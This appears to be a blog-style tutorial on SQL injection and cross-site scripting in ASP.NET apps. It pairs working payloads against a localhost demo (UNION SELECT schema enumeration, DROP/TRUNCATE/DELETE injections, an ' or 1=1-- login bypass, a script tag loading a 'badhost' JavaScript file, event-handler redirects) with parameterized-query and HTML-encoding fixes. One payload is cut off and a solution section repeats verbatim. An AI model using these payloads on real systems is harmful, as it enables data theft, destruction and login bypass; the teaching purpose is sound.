SQL INJECTION and Cross-Site Scripting Attacks
What is SQL Injection and Cross-Site Scripting

Cross-Site Scripting (XSS or CSS)
· Enables malicious attackers to inject client-side script (JavaScript) or HTML markup into web pages viewed by other users.

SQL Injection
· Insertion of a SQL query via input data from the client to the application that is later passed to an instance of SQL Server for parsing and execution.
· Very common with PHP and Classic ASP applications.

The mentioned vulnerabilities can happen via:
1. Query string
2. Form input box
TIPS FOR GOOD PROGRAMMING:

Do not rely solely on client-side validation (JavaScript)
The attacker can bypass client-side validation by disabling JavaScript in the web browser. Do not depend exclusively on JavaScript to search and replace potentially dangerous HTML statements or SQL Injection keywords. Make sure to revalidate the user input on the server side. I know this is a lot of work, but for the sake of security, we have to do it. In the Add Comments section, the page uses JavaScript to check for blank fields. Try to disable JavaScript in your browser and add the comment again.
Replacing a single quotation mark (') with two single quotation marks ('')
I saw some web sites mentioning that the SQL Injection vulnerability can be prevented by simply replacing single quotation marks with double quotation marks. That is not always the case; attackers will still be able to inject malicious script or HTML markup into a table without using the single quotation mark, and they can bypass the filter by using a different character encoding.
Inline Code/tags
There are several ways to display information from an ASP.NET program. We can display information in the page using an embedded code block <% ... %> or using the <%= ... %> construction. Another way is to use the data-binding syntax <%# ... %> to bind control property values to the data and specify values for retrieving, updating, deleting, and inserting data. Make sure to apply either the HttpUtility.HtmlEncode or the Server.HtmlEncode method to encode the form data and other client requests before displaying them in the web page. This will help prevent possible Cross-Site Scripting injection attacks.
With ASP.NET 4.0, the new <%: ... %> code nugget syntax will automatically HTML encode the output before it is rendered.
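As an added example (not code from the original post), here is a code-behind helper that encodes the Add Comments text with HttpUtility.HtmlEncode before it is written into the page, with a second method for the attribute context. The CommentRenderer class, its method names and the System.Web reference are assumptions.

```csharp
// Added example, not from the original post. Assumed names: CommentRenderer,
// RenderComment, RenderCommentInput; requires a reference to System.Web.
using System;
using System.Web;

public static class CommentRenderer
{
    // Element-content context: the comment lands between tags, e.g. <p>...</p>.
    // HttpUtility.HtmlEncode turns <, >, & and quotes into entities, so the
    // browser shows "<script src=...>" as text instead of loading the script.
    // In .aspx markup, <%: comment %> is equivalent to <%= HttpUtility.HtmlEncode(comment) %>.
    public static string RenderComment(string rawComment)
    {
        return "<p class=\"comment\">" + HttpUtility.HtmlEncode(rawComment) + "</p>";
    }

    // Attribute context: when the value is echoed back into an input box
    // (value="..."), encode for the attribute and keep the attribute quoted so an
    // onmouseover or ONLOAD payload cannot close the quote and add a new attribute.
    public static string RenderCommentInput(string rawComment)
    {
        return "<input type=\"text\" name=\"comment\" value=\""
             + HttpUtility.HtmlAttributeEncode(rawComment) + "\" />";
    }

    public static void Main()
    {
        // Constructed sample input: the script-include payload used in the post.
        string payload = "<script src=\"http://localhost:9997/badhost/maliciousscript.js\"></script>";
        Console.WriteLine(RenderComment(payload));
        Console.WriteLine(RenderCommentInput(payload));
    }
}
```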
Query string

1. ATTACK ONE (Query string):
Definition: Insertion of a SQL query via input data from a client to an application that is later passed to an instance of SQL Server for parsing and execution.

UNION SQL Injection
We will use the UNION statement to mine all the table names in the database. The two consecutive hyphens "--" start a SQL comment (the comment part was shown in green in the original listings); the part of the statement after the hyphens will not be evaluated by SQL Server.

Let's start with examples:
1. select * from test;

   testid  name
   1       piyush
   2       test1
   3       test2
   4       test3
   5       test4
   6       test5
Now if you execute this query:

   select * from test UNION SELECT NULL FROM INFORMATION_SCHEMA.TABLES--;

it will yield the error "All queries combined using a UNION, INTERSECT, or EXCEPT operator must have an equal number of expressions in their target lists." This error message appears if we try to run a UNION, INTERSECT, or EXCEPT query whose SELECT lists do not have an equal number of expressions. The workaround is to keep adding NULL expressions in the URL until the error message disappears.
Now suppose you have a page that shows the name of the person that has id=1 (a simple scenario). When we fire this query:

   http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 UNION SELECT NULL,NULL FROM INFORMATION_SCHEMA.TABLES--

the error message disappears, because the UNION query now has an equal number of expressions. Next, try to replace each of the NULL values with TABLE_NAME. If you get an error message, leave it as NULL.
   select * from test where testid=1 UNION SELECT NULL,NULL FROM INFORMATION_SCHEMA.TABLES--;

   testid  name
   1       piyush
   NULL    NULL

Hence we get the information of the table. Now execute this query:

   http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 UNION SELECT NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

This query will give you all the database tables available in that schema:

   NULL    TEST
   1       piyush
Next, we will extract every column name in the TEST table:

   http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 UNION SELECT NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'TEST'--

And bingo: we got all the column names:

   NULL    name
   NULL    testid
   1       piyush

Now it becomes very easy for the attacker to execute any script and do a variety of operations:

DELETE the data in the table
   http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 DELETE FROM TEST WHERE name='piyush' --

TRUNCATE the table
   http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 TRUNCATE TABLE TEST--

DROP the table
   http://localhost:1234/TESTAPP/SHOWPERSONDETAILS.aspx?id=1 DROP TABLE TEST --
SOLUTION:
Preventing SQL Injection
· SQL injection can be prevented if you adopt an input validation technique in which user input is checked against a set of defined rules for length, type, and syntax and also against business rules.
· You should ensure that users with permission to access the database have the least privileges. Additionally, do not use system administrator accounts like "sa" for Web applications. Also, you should always make sure that a database user is created only for a specific application and this user is not able to access other applications. Another method for preventing SQL injection attacks is to remove all stored procedures that are not in use.
· Use strongly typed parameterized query APIs with placeholder substitution markers, even when calling stored procedures.
· Take care when using stored procedures: they are generally safe from injection, but they can still be injectable (for example via the use of exec() or by concatenating arguments within the stored procedure).
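As an added example that is not the post's own code, here is how the data access behind the SHOWPERSONDETAILS.aspx page from Attack One can be written with a strongly typed parameterized query; the same approach fixes the login query in the forms-input attack. The PersonRepository class, its method names and the connection string passed to it are assumptions.

```csharp
// Added example, not from the original post. Assumed names: PersonRepository,
// TryParseId, GetNameById and the connection string given to the constructor.
using System;
using System.Data;
using System.Data.SqlClient;

public class PersonRepository
{
    private readonly string _connectionString;

    public PersonRepository(string connectionString)
    {
        _connectionString = connectionString;
    }

    // Input validation: the id from the query string must be an integer. Anything
    // else, including "1 UNION SELECT NULL,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--",
    // is rejected before any SQL is built.
    public static bool TryParseId(string rawId, out int id)
    {
        return int.TryParse(rawId, out id);
    }

    // Parameterized query: the SQL text is a constant and the id travels as a typed
    // int parameter, so SQL Server never parses user input as part of the statement.
    // The pattern this replaces is concatenation like
    //   "SELECT name FROM test WHERE testid = " + Request.QueryString["id"]
    public string GetNameById(int id)
    {
        const string sql = "SELECT name FROM test WHERE testid = @id";
        using (SqlConnection conn = new SqlConnection(_connectionString))
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();
            object result = cmd.ExecuteScalar();   // null when no row matches
            return result == null || result == DBNull.Value ? null : (string)result;
        }
    }
}

// Wiring in the page's code-behind (assumed Page_Load). Combined with the least-privilege
// advice above, the database login in the connection string should only have SELECT on
// test, so even a successful injection could not DROP TABLE TEST.
//   int id;
//   if (!PersonRepository.TryParseId(Request.QueryString["id"], out id))
//   {
//       Response.StatusCode = 400;   // reject the request instead of guessing
//       return;
//   }
//   string name = new PersonRepository(connStr).GetNameById(id);
//   lblName.Text = HttpUtility.HtmlEncode(name ?? "not found");
```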
Forms input:

1. ATTACK ONE (Forms input):
We can bypass the login page by simply adding ' or 1=1 -- or ') or 1=1-- to the login ID and placing any value in the password field. See the example below.
Let's see what happens when this input is taken by the query and gets executed:

Query:
   SELECT Loginid,password,username FROM logintable WHERE username = 'test@test.com' or 1=1--' AND PASSWORD='asdasdda'

So you see the rest of the statement (the password check) gets commented out and the WHERE condition becomes true because of the OR operator. Thus, with not only a wrong password but also a wrong username, the hacker or spam bots can enter the website as an authorized user.
SOLUTIONS:
1. To prevent spam/bots from entering the illegal script: use CAPTCHA so that the user must get validated before entering. For more information on CAPTCHA visit the article: CAPTCHA PROTECTING ONES OWN .........
2. To prevent the user from putting in an illegal script: there is no specific code or tool that can be put into the page to get relief. I tried this.....................
2.1) First put the restriction on the textbox so that the user cannot enter special characters. If so (you find it is necessary)... see Tips and Tricks with jQuery and ASP.NET Controls (TEXTBOX IN CONTROL)
2.2) Then check the username and password retrieved from the database against the ones entered by the user:
   // Needs at the top of the code-behind file:
   // using System; using System.Data; using System.Data.SqlClient;
   string username = txtUserName.Text;
   string password = txtPWD.Text;

   // Parameterized query: the typed values are sent as parameters, so an input such as
   // ' or 1=1-- is compared as a literal string and never becomes part of the SQL text.
   // connectionString is assumed to be the application's database connection string.
   DataSet dsUsers = new DataSet();
   using (SqlConnection conn = new SqlConnection(connectionString))
   using (SqlCommand cmd = new SqlCommand(
       "SELECT username, password FROM logintable WHERE username = @username AND password = @password", conn))
   {
       cmd.Parameters.Add("@username", SqlDbType.NVarChar, 256).Value = username;
       cmd.Parameters.Add("@password", SqlDbType.NVarChar, 256).Value = password;
       new SqlDataAdapter(cmd).Fill(dsUsers);
   }

   // Check the row count before reading Rows[0]; an unknown user returns no rows and
   // indexing Rows[0] would throw. Then compare the stored values with the entered ones.
   bool authenticated = false;
   if (dsUsers.Tables[0].Rows.Count > 0)
   {
       string tableusername = dsUsers.Tables[0].Rows[0]["USERNAME"].ToString();
       string tablepassword = dsUsers.Tables[0].Rows[0]["PASSWORD"].ToString();
       authenticated = string.Equals(username, tableusername, StringComparison.OrdinalIgnoreCase)
                    && string.Equals(password, tablepassword, StringComparison.Ordinal);
   }

   if (authenticated)
   {
       // Then go to your page or do the necessary.........
   }
   else
   {
       Response.Write("<script>alert('Invalid userid / password.')</script>");
   }
2. ATTACK TWO
Cross-Site Scripting
Cross-Site Scripting enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users. This can happen through the input form. Update the comment with the string "<script src="http://localhost:9997/badhost/maliciousscript.js"></script>". You should see a pop-up message when you navigate to the Login.aspx page.
Update the form value with any of the strings listed below and observe the outcomes. Make sure the string is on one line with no line break. If the JavaScript is executed successfully by the browser or displays unexpected results, then the web page is subject to Cross-Site Scripting.
· <BODY ONLOAD='javascript:window.location="http://www.google.com"'>
· <BODY ONLOAD="javascript:alert('XSS')">
· <p onmouseover=javascript:window.location="http://www.google.com";>test
· <p onmousemove=javascript:window.location="http://www.google.com";>test
· <p onMouseDown=javascript:window.location="http://www.google.com";>test
· <span onmouseover=javascript:window.location="http://www.google.
SOLUTION:
1. To prevent spam/bots from entering the illegal script: use CAPTCHA so that the user must get validated before entering. For more information on CAPTCHA visit the article: CAPTCHA PROTECTING ONES OWN .........
2. To prevent the user from putting in an illegal script: there is no specific code or tool that can be put into the page to get relief. I tried this.....................
2.1) First put the restriction on the textbox so that the user cannot enter special characters. If so (you find it is necessary)... see Tips and Tricks with jQuery and ASP.NET Controls (TEXTBOX IN CONTROL)